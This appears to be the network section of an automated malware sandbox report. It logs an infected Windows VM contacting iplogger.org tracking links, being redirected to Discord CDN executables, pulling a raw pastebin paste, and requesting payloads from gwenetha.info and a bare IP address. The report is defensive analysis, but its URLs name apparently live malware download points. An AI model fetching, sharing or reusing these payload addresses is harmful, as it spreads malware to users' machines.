Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
gwenetha.info | 172.67.131.232 | |
pastebin.com | 104.23.98.190 | |
iplogger.org | 88.99.66.31 | |
cdn.discordapp.com | 162.159.135.233 | |
whatitis.website |
- TCP Requests
-
-
192.168.56.101:49208 104.21.12.27:443gwenetha.info
-
192.168.56.101:49206 104.23.99.190:443pastebin.com
-
192.168.56.101:49201 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49204 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49205 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49210 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49211 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49212 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49213 162.159.134.233:443cdn.discordapp.com
-
192.168.56.101:49200 203.159.80.228:80
-
192.168.56.101:49198 88.99.66.31:443iplogger.org
-
192.168.56.101:49207 88.99.66.31:443iplogger.org
-
192.168.56.101:49209 88.99.66.31:443iplogger.org
-
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:65329 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:59370 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
8.8.8.8:53 192.168.56.101:62324
-
GET
200
https://iplogger.org/1hyTq7
REQUEST
RESPONSE
BODY
GET /1hyTq7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:25:30 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=hftadu0r6bpqgheht1k46cds16; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451461; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
301
https://iplogger.org/2CQAB5.exe
REQUEST
RESPONSE
BODY
GET /2CQAB5.exe HTTP/1.1
Host: iplogger.org
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:25:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ea8q6vn2sr4haqt48l2s1sn1e7; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451460; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
REQUEST
RESPONSE
BODY
GET /attachments/826198252025675816/826537386485612574/china.png HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:25:31 GMT
Content-Type: image/png
Content-Length: 7680
Connection: keep-alive
Set-Cookie: __cfduid=d418f44c446629ff9d18d62a2b13898e21617596731; expires=Wed, 05-May-21 04:25:31 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00355ef23a1d7-ICN
Accept-Ranges: bytes
Age: 451743
Cache-Control: public, max-age=31536000
ETag: "6be41709f8bfbf06307cc56d04249801"
Expires: Tue, 05 Apr 2022 04:25:31 GMT
Last-Modified: Tue, 30 Mar 2021 19:24:29 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e069b40000a1d76c342000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132269285743
x-goog-hash: crc32c=aF03UA==
x-goog-hash: md5=a+QXCfi/vwYwfMVtBCSYAQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7680
X-GUploader-UploadID: ABg5-UxiLDAZpR0Y2Z-4q6HmHSbdJu2Aw-itbIW-AA7MULcbcKMNQuhX9Jwm3JIVWTkUW9lL6Zi8VfeBlfDJSccdNIEhbl2dsA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2a3bwWSKeenm0yjTgCI23WmXLTFYgtOuCPO9bWS5OnkRK2QFpQfldH0PvNRXXfgkwvOZHo9Wq0nMStXFwbyncTEnxCX8kuvEEMlGNOjxxBgv%2Brg%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
REQUEST
RESPONSE
BODY
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:25:32 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=df9681c8545da0e9d7c1b7380c8ee569a1617596732; expires=Wed, 05-May-21 04:25:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0035bcbeaa1d7-ICN
Age: 251
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e06d640000a1d78625b000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wJzhjbQAWcX3PrtNXZ5OZyL53S%2Bhkck%2BD3gnMacjxpIgY5ueAQ9Hw9kKhS0%2FjfhZO4UdEUiDPS8EWuQH8b1ntHFqZS%2BHSR3IrabXfkT4z6xX6uE%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
REQUEST
RESPONSE
BODY
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:25:32 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d38d561ff7e2299bdfe1ab55dd3724d491617596732; expires=Wed, 05-May-21 04:25:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0035bdd2b12ca-ICN
Age: 251
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e06d69000012ca2c121000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=43%2Bhg4NocYzzU%2BezMNl2wUaRnhn6a4HGOX7QRCNIiWJDWvgglW2TbP1cI%2FzBKxAxXnXyAOqIxul6o8m%2FGPbNU9ElO8ld9rxi7emCp5ScWXSTjdU%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
REQUEST
RESPONSE
BODY
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:25:32 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d9f4c6891f37a3538cbea799cfc678a811617596732; expires=Wed, 05-May-21 04:25:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0035c3fa8a255-ICN
Age: 251
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e06da80000a2553481f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NJv3oU2x1NEPdPSRKZnbn9ecoFBAxAMWQCMXin6nea7qasGiGskkh5WQoTOGl5GVPkOFOtREYCNUMsykFJ%2BGAa1Shw0T0PIJxfmWaLSefgvzULQ%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://iplogger.org/1iPtu7
REQUEST
RESPONSE
BODY
GET /1iPtu7 HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:25:46 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lo0go5bg4i8o1rr5k1l9k47de5; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451445; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://pastebin.com/raw/gCyjHCCH
REQUEST
RESPONSE
BODY
GET /raw/gCyjHCCH HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:25:46 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1c4f73918199f017ecb5a835b24801191617596746; expires=Wed, 05-May-21 04:25:46 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 251
cf-request-id: 0941e0a3e20000a1b33e14d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63b003b30a3da1b3-ICN
GET
404
https://gwenetha.info/setup-KGQJ-1.exe
REQUEST
RESPONSE
BODY
GET /setup-KGQJ-1.exe HTTP/1.1
Host: gwenetha.info
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Mon, 05 Apr 2021 04:26:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: keep-alive
Set-Cookie: __cfduid=d63ca68974d4caa8e544e937606fa0fae1617596762; expires=Wed, 05-May-21 04:26:02 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 0941e0e1f3000056ddc7181000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gmp422N4x%2BGY9FWWl9n9OpxvDB3143Jf2nnQ4MjEM%2BShoASAF%2F9u%2B4NcIFLorVOiOsBqoJJr3qs4RospqD30T3B2pRY0NIJDCnjBY6dr"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63b00416596e56dd-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
301
https://iplogger.org/2LehR6.exe
REQUEST
RESPONSE
BODY
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=koaci7j3uo33ub43nphkes98l1; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451428; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da99863055300a00834f52dbdfc31776d1617596763; expires=Wed, 05-May-21 04:26:03 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941e0e4b90000015432a17000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wQC4Gamw5JJYPsHv2A2lc8%2B%2FcuxZFRQDmylqWqK82zcG7TjV5FbjPnIdp81UhSCOCELu8bJROh1e4n7P4M6BcRoBtYHYAOXGtngZaSolB9F67IQ%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63b0041acffc0154-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da99863055300a00834f52dbdfc31776d1617596763; expires=Wed, 05-May-21 04:26:03 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941e0e58c00000154c19c0000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FXexFK%2B2LFkLOquUyE8ByjhRaYfL8pFgsYH9NOZfWtPzYhnuK0OLanVdqblUn7%2FwoLQc6bvtkocSRJy6ih3OmJi0f9kFgaXWVQAI1clBzs%2Bjm1A%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63b0041c1a840154-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
403
https://cdn.discordapp.com/attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe
REQUEST
RESPONSE
BODY
GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:26:03 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d9ba7e51b22e501c4b3ba1b409c8b2ed41617596763; expires=Wed, 05-May-21 04:26:03 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b0041c1a27e9ec-ICN
Age: 248
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e0e5900000e9ec25802000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uy0DBZJ4PhYaAXNgHdhHtQPXr-fMEjb214k4lBMCsgfAwX3FQoZ4J4-MeRNNmimijjA9VnigLiWft_v8_ovP2E
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WjZ80u2J3XNl6%2FP1KA8rBqSAaM64aej6o2FfdSM0J1SRvs5AKSCj9F5EqIrHt4tzBriee6n0Hkgi9ENv%2B1TFfXzcEhftdwSlpOEIZBmMyStAyNc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/826416818390040589/826469949593485312/file.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:26:07 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d73f16b7f4aa6b701f0343aa825a99d691617596767; expires=Wed, 05-May-21 04:26:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00431d89b0154-ICN
Age: 220
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:22:27 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e0f32300000154be805000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uz26yCKX_mnm6Nq82REhI6Fx_B21T6sSzasO3o7WjHseapUVbZdAIUTBzRlptQQvF8aBJBvqa2sWRPCuaJyXZft1yNPFg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oog0b4TUzlGpVhjlB3zbCQWoksJ3HwgDpHjuYbPzXMsNQIt%2FudBPzFcDveeQB45YVmxoCyyyggCrs5%2B8R87FReVjDFPF1whcSnWOgW8s7%2BPatfE%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:26:37 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d0c717e0f79a0dbc943755c9a3a6506d91617596797; expires=Wed, 05-May-21 04:26:37 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b004f24cd5e9ec-ICN
Age: 282
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e16b6d0000e9ec6bb8c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyFfb0ju1UrZ8d3NVFfJE2mzlIJ6zA-jrpBc5Sed9FaHeB6-X5SNWuiJVWee-3nAVZmMLnfGcMql2KTa7C362jNEp-T7Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=EmBvHK68gn6Tp0%2F9kl8GKjdPcmWX5VrBXpyLwwoXHO0cDaW9y0o6%2FWS%2BM0qV0z9puD3Xy%2BRLgrp8XFQaV6VeIqqtrLqbHMlLTfRxa57Gz8DSdc4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:26:43 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d1007e0954b59ad67538551f4834607ed1617596803; expires=Wed, 05-May-21 04:26:43 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00514ffd1e9d8-ICN
Accept-Ranges: bytes
Age: 451812
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Tue, 05 Apr 2022 04:26:43 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e1811f0000e9d8f122c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=G5GT%2FAxUTckhT3YFXuDJGfv9lB%2BIFedk9yOBCCdqfPEGxoMR1X3kg2iWH6DGTLgscp0s1elQiC12HNW%2Bhpqu%2FxQlRYQErrucNhUab6wYYg4pN9I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
http://203.159.80.228/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: 203.159.80.228
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:25:31 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2
Last-Modified: Tue, 30 Mar 2021 16:04:04 GMT
ETag: "1f-5bec325bb5626"
Accept-Ranges: bytes
Content-Length: 31
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts